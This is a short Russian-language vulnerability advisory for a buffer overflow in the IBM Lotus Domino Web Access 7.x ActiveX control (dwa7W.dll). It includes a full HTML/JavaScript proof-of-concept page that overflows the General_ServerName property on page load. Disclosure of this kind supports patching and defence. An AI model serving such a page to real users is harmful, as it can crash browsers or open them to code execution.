Программа:
IBM Lotus Domino 7.x
IBM Lotus Domino Web Access 7.x

Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в dwa7.dwa7.1 ActiveX компоненте (dwa7W.dll) при обработке строки, назначенной свойству "General_ServerName". Атакующий может передать специально сформированную строку уязвимому свойству и затем вызвать метод InstallBrowserHelperDll(), что приведет к выполнению произвольного кода.

Пример:

<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = 'A';

while (s.length <= 12000) s = s + 'A';

obj.General_ServerName = s;
obj.InstallBrowserHelperDll();

}
</script>

</head>
<body onload="JavaScript: return Check();">
<object id="obj" classid="clsid:E008A543-CEFB-4559-912F-C27C2B89F13B" />
</object>
</body>
</html>



Оставить мнение